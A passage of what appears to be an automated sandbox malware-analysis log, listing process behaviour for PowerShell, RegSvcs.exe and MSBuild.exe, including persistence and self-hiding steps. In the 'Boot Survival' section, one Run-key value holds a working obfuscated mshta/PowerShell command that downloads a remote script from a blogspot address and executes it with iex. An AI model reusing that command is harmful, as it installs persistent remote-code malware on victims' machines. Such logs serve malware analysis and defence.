              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A77A23 push eax; retf 5_2_00A77A2A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A77A08 push eax; retf 5_2_00A77A22
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A77A41 push eax; retf 5_2_00A77A42
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A77CE1 push ecx; retf 5_2_00A77CE2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00A77CD8 push ebx; retf 5_2_00A77CDA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_04D358F4 push eax; retf 5_2_04D358F5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0670202D push eax; ret 5_2_06702B29
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0677011E push es; retf 7701h5_2_067718F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_067918F6 push ss; iretd 5_2_067918F7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_0679575F push es; ret 5_2_06795760
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_067A60EB push es; ret 5_2_067A60EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_067A6097 push es; ret 5_2_067A60A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_068A0080 push es; ret 5_2_068A5F30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_068A5E85 push es; ret 5_2_068A5F30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_068A60AA push es; retf 5_2_068A612C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_068A60EA push es; retf 5_2_068A612C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_068A571F push ebp; iretd 5_2_068A5720
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_068A3116 push esp; iretd 5_2_068A3119
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 6_2_00FC2739 push edi; retf 006Bh6_2_00FC273A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 6_2_00FC28B9 push eax; retf 006Bh6_2_00FC28BA
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 6_2_00FC277B push ecx; retf 006Bh6_2_00FC2782
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 6_2_00FC2768 push edi; retf 006Bh6_2_00FC2776
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 6_2_00FC29A0 push esp; iretd 6_2_00FC29A1
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 6_2_00FC265D push edi; retf 006Bh6_2_00FC265E
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 6_2_00FC26D9 push edi; retf 006Bh6_2_00FC26DA
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeCode function: 8_2_00F02739 push edi; retf 006Bh8_2_00F0273A
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeCode function: 8_2_00F028B9 push eax; retf 006Bh8_2_00F028BA
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeCode function: 8_2_00F0277B push ecx; retf 006Bh8_2_00F02782
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeCode function: 8_2_00F029A0 push esp; iretd 8_2_00F029A1
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeCode function: 8_2_00F02768 push edi; retf 006Bh8_2_00F02776
              Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeCode function: 8_2_00F0265D push edi; retf 006Bh8_2_00F0265E

              Boot Survival

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew2 mshta "javascript:ql=['Scripting.FileSystemObject','WScript.Shell','powershell -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm minecap4-22-24.blogspot.com/haha | iex);Start-Sleep -Seconds 5;','run']; la=[ql[3],ql[0],ql[1],ql[2]]; new ActiveXObject(la[2])[la[0]](la[3], 0, true);close();new ActiveXObject(la[1]).DeleteFile(WScript.ScriptFullName);".Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DRAKEXnew1Jump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: c:\users\user\desktop\o3kyzpe7f4.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
